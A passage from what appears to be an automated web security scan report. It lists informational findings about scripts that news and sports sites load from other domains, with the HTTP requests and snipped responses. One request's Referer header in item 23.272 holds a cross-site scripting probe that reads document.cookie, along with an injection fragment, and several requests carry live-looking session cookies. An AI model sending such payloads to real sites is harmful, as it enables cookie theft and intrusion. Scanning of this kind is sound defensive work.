User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

<html><head><link rel="stylesheet" type="text/css" href="http://ycombinator.com/news.css">
<link rel="shortcut icon" href="http://ycombinator.com/favicon.ico">
<script>
function byId(id) {
return document.getElementById(id);
}

function vote(node) {
var v = node.id.split(/_/); // {'up', '123'}
var item = v[1];

// adjust score
var score = byId('score_' + item);
var newscore = parseInt(score.innerHTML) + (v[0] ==
...[SNIP]...
<br>
<script type="text/javascript"
src="http://www.co2stats.com/propres.php?s=1138"></script>
...[SNIP]...

23.266. http://news.ycombinator.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.ycombinator.com
Path:	/news

Issue detail

The response dynamically includes the following script from another domain:

http://www.co2stats.com/propres.php?s=1138

Request

GET /news HTTP/1.1
Host: news.ycombinator.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc03049.popsci.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/16016899/Right1/WorldPub/PSC_AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?;ord=16016899?
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?
http://ad.doubleclick.net/adj/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/973660255/Bottom/WorldPub/PSC_CSX_Home_Geo_728x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?;ord=973660255?

Request

Response

23.268. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.scientificamerican.com
Path:	/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad-apac.doubleclick.net/adj/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;click0=http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1016552314/Right2/sciam.com/p_2010-12_Volt_CoBrand_ros/p_2010-12_Volt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?;ord=1016552314?
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1242882707/Right1/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://$$&ord=1242882707
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2009818&PluID=0&w=728&h=90&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1095766167/Top/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://$$&ord=1095766167

Request

Response

23.269. http://openchannel.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.270. http://photoblog.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.271. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

23.272. http://photoblog.msnbc.redacted/_vine/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /_vine/a HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sunb630a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee5d9d58c461
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377588; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:56:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28946

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a2e5335e5d3629f32d38728e2045d241483ba42d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.273. http://planetary.org/blog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://planetary.org
Path:	/blog

Issue detail

The response dynamically includes the following scripts from other domains:

http://embed.technorati.com/embed/er4sdfxfcg.js
http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js
https://s7.addthis.com/js/250/addthis_widget.js

Request

GET /blog HTTP/1.1
Host: planetary.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:46 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 46216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</div>-->
<script type="text/javascript" src="http://embed.technorati.com/embed/er4sdfxfcg.js"></script>
...[SNIP]...
</table>
<script
src="http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#planetary"></script>
...[SNIP]...

23.274. http://polls.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://polls.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: polls.newsvine.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

23.275. http://preps.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://preps.scout.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.276. http://profootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profootball.scout.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://images.video.msn.com/js/ch/channels.js

Request

GET / HTTP/1.1
Host: profootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:16:11 GMT
ETag: "1CBC023A97B2780"
Content-Type: text/html
Content-Length: 41358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.277. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://progolftalk.nbcsports.com
Path:	/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js?ver=1.3
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&ver=20090102
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296353847&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated
http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3

Request

GET /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:17:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 02:17:27 +0000
Cache-Control: max-age=271, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-A3>; rel=shortlink
X-nananana: Batcache
Content-Length: 120479

<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
   <meta http-equiv="conte
...[SNIP]...
<meta name="keywords" content="tiger woods, pga tour, farmers insurance open, jhonattan vegas" />

       <script src='http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296353847&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&ver=20090102'></script>
...[SNIP]...

   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&ver=1.3"></script>
...[SNIP]...

   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&ver=1.3"></script>
...[SNIP]...

<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.278. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://progolftalk.nbcsports.com
Path:	/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js?ver=1.3
http://s.gravatar.com/js/gprofiles.js?o&ver=MU
http://s.stats.wordpress.com/w.js?19
http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&ver=20090102
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&ver=1.3
http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&ver=1.3
http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&ver=1.4.4
http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&ver=20101110
http://wordpress.com/remote-login.php?action=js&host=progolftalk.nbcsports.com&id=17383827&t=1296410883&back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated
http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 18:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 18:08:03 +0000
Cache-Control: max-age=298, must-revalidate
Vary: Cookie
